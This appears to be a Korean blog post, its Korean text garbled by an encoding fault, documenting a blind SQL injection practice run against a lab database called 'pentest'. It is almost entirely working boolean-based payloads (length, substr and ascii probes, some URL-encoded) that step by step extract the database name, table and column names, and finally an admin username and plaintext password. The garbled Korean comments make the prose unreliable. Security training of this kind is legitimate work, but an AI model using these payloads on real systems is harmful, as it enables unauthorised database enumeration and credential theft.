๐ Secure
SQL Injection ์ค์ต
- -
๋ฐ์ํ
1. ์๋ฌ ๋ฐ ์ทจ์ฝ์ ์ง๋จ
# ๋ฐ์ดํฐ ๋ฒ ์ด์ค์ ๊ธ์ ์ 7๊ธ์
length((SELECT database()))=7
# ๋ฐ์ดํฐ ๋ฒ ์ด์ค์ ๊ธ์ ์ฒซ ๊ธ์๊ฐ 'a' ์ธ๊ฐ์?
substr((SELECT database()))='a'
# ' < ๊ธฐํธ๋ฅผ ์ธ ์ ์์ ๋ ์์คํค์ฝ๋ ๋ถ๋ฑํธ๋ก ์ฌ์ฉ
ascii(substr((SELECT database()),1,1))>80
ascii(substr((SELECT database()),1,1))=112
ascii(substr((SELECT database()),2,1))=101
ascii(substr((SELECT database()),3,1))=110
ascii(substr((SELECT database()),4,1))=116
ascii(substr((SELECT database()),5,1))=101
ascii(substr((SELECT database()),6,1))=115
ascii(substr((SELECT database()),7,1))=116
ํ ์ด๋ธ ๊ฐฏ์ ์ถ์ถ
# pentest ํ
์ด๋ธ ๊ฐฏ์๊ฐ 5๊ฐ ์ธ๊ฐ์ ?
(SELECT count(*) FROM information_schema.tables WHERE table_schema=0x70656E74657374)=5
์ฒซ๋ฒ์งธ ํ ์ด๋ธ ๊ธ์ ์ ์ถ์ถ
# ์ฒซ๋ฒ์งธ ํ
์ด๋ธ์ ๊ธ์์๊ฐ 5๊ธ์ ์ธ๊ฐ์ ?
length((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 0,1))=5
# ๋๋ฒ์งธ ํ
์ด๋ธ์ ๊ธ์์๊ฐ n๊ธ์ ์ธ๊ฐ์ ?
length((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 1,1))=n
# ์ธ๋ฒ์งธ ํ
์ด๋ธ์ ๊ธ์์๊ฐ 6๊ธ์ ์ธ๊ฐ์ ?
length((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 2,1))=6
# ๋ค๋ฒ์งธ ํ
์ด๋ธ์ ๊ธ์์๊ฐ n๊ธ์ ์ธ๊ฐ์ ?
length((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 3,1))=n
# ๋ค์ฏ๋ฒ์งธ ํ
์ด๋ธ์ ๊ธ์์๊ฐ 4๊ธ์ ์ธ๊ฐ์ ?
length((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 4,1))=4
# pentest์ ์ฒซ๋ฒ์งธ ํ
์ด๋ธ์ด๋ฆ์ ์ฒซ ๊ธ์๊ฐ 98์ธ๊ฐ์ ?
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 0,1),1,1))=98
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 0,1),2,1))=111
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 0,1),3,1))=97
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 0,1),4,1))=114
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 0,1),5,1))=100
# 3 > 6๊ธ์ notice
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 2,1),1,1))=110
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 2,1),2,1))=111
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 2,1),3,1))=116
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 2,1),4,1))=105
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 2,1),5,1))=99
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 2,1),6,1))=101
# 4 > n๊ธ์
# 5 > 4๊ธ์ user
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 4,1),1,1))=117
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 4,1),2,1))=115
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 4,1),3,1))=101
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 4,1),4,1))=114
ํ ์ด๋ธ ์นผ๋ผ์ ์ฒซ๋ฒ์งธ ์นผ๋ผ์ ๊ธ์ ์๋?
# pentest ๋ฐ์ดํฐ๋ฒ ์ด์ค์ user ํ
์ด๋ธ์ ์ฒซ๋ฒ์งธ ์นผ๋ผ์ ์ด๋ฆ์ 2๊ธ์ ์ธ๊ฐ์ ?
length((SELECT column_name FROM information_schema.columns WHERE table_schema=0x70656E74657374 and table_name=0x75736572 LIMIT 0,1))=2
length((SELECT column_name FROM information_schema.columns WHERE table_schema=0x70656E74657374 and table_name=0x75736572 LIMIT 1,1))=6
length((SELECT column_name FROM information_schema.columns WHERE table_schema=0x70656E74657374 and table_name=0x75736572 LIMIT 2,1))=8
length((SELECT column_name FROM information_schema.columns WHERE table_schema=0x70656E74657374 and table_name=0x75736572 LIMIT 3,1))=8
length((SELECT column_name FROM information_schema.columns WHERE table_schema=0x70656E74657374 and table_name=0x75736572 LIMIT 4,1))=4
length((SELECT column_name FROM information_schema.columns WHERE table_schema=0x70656E74657374 and table_name=0x75736572 LIMIT 5,1))=8
length((SELECT column_name FROM information_schema.columns WHERE table_schema=0x70656E74657374 and table_name=0x75736572 LIMIT 6,1))=5
length((SELECT column_name FROM information_schema.columns WHERE table_schema=0x70656E74657374 and table_name=0x75736572 LIMIT 7,1))=7
length((SELECT column_name FROM information_schema.columns WHERE table_schema=0x70656E74657374 and table_name=0x75736572 LIMIT 8,1))=5
์ฒซ๋ฒ์งธ ์นผ๋ผ์ ์ฒซ๋ฒ์งธ ๊ธ์
# pentest์ user์ ์๋ ์ฒซ๋ฒ์งธ ์ปฌ๋ผ : ID
ascii(substr((SELECT+column_name+FROM+information_schema.columns+WHERE+table_schema%3d0x70656E74657374+and+table_name%3d0x75736572+LIMIT+0,1),1,1))=73
ascii(substr((SELECT+column_name+FROM+information_schema.columns+WHERE+table_schema%3d0x70656E74657374+and+table_name%3d0x75736572+LIMIT+0,1),2,1))=68
# pentest์ user์ ์๋ ๋๋ฒ์งธ ์ปฌ๋ผ : userID
ascii(substr((SELECT+column_name+FROM+information_schema.columns+WHERE+table_schema%3d0x70656E74657374+and+table_name%3d0x75736572+LIMIT+1,1),1,1))=117
117 115 101 114 73 68 > userID
# pentest์ user์ ์๋ ์ธ๋ฒ์งธ ์ปฌ๋ผ : password
ascii(substr((SELECT+column_name+FROM+information_schema.columns+WHERE+table_schema%3d0x70656E74657374+and+table_name%3d0x75736572+LIMIT+2,1),1,1))=112
112 97 115 115 119 111 114 100 > password
# pentest์ user์ userID์ ์ฒซ๋ฒ์งธ ์ปฌ๋ผ์ ๊ธ์์๋ 5๊ธ์
length((SELECT userID FROM pentest.user LIMIT 0,1))=5
# pentest์ user์ userID์ ์ฒซ๋ฒ์งธ ์ปฌ๋ผ์ ์ฒซ ๊ธ์ = 97
ascii(substr((SELECT userID FROM pentest.user LIMIT 0,1),1,1))=97
# 97 100 109 105 110 > admin
# pentest์ user์ password์ ์ฒซ๋ฒ์งธ ์ปฌ๋ผ์ ๊ธ์์๋ 11๊ธ์
length((SELECT password FROM pentest.user LIMIT 0,1))=11
# 97 100 109 105 110 > admin
# pentest์ user์ password์ ์ฒซ๋ฒ์งธ ์ปฌ๋ผ์ ์ฒซ ๊ธ์ = 49
ascii(substr((SELECT password FROM pentest.user LIMIT 0,1),1,1))=49
# 49 113 50 119 51 101 52 114 53 116 33 > 1q2w3e4r5t!
๋ฐ์ํ
'๐ Secure' ์นดํ ๊ณ ๋ฆฌ์ ๋ค๋ฅธ ๊ธ
XSS - Cross Site Script (0) | 2022.07.12 |
---|---|
Secure coding (0) | 2022.07.12 |
CODE Injection (0) | 2022.07.07 |
SQL Injection ์ธ์ฆ ์ฐํ (0) | 2022.07.07 |
SQL Injection - Error Based (0) | 2022.07.06 |
Contents
๋น์ ์ด ์ข์ํ ๋งํ ์ฝํ ์ธ
์์คํ ๊ณต๊ฐ ๊ฐ์ฌํฉ๋๋ค